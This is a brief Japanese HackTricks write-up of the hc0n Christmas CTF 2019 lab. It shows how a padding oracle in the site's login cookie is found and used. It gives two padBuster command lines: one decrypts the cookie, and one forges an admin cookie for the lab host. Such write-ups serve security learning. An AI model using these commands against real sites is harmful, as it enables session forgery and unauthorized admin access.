hacktricks/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md

4.8 KiB
Raw Blame History

hc0n クリスマス CTF - 2019

☁️ HackTricks Cloud ☁️ - 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

列挙

私はツール Legionを使用してマシンを列挙し始めました:

2 つのポートが開いています: 80 (HTTP) と 22 (SSH)

Web ページでは新しいユーザーを登録することができ、クッキーの長さが指定されたユーザー名の長さに依存することに気づきました:

そして、クッキーのいくつかのバイトを変更すると、このエラーが表示されます:

この情報とパディングオラクル脆弱性の読み取りにより、それを悪用することができました:

perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"

ユーザーadminを設定します:

perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥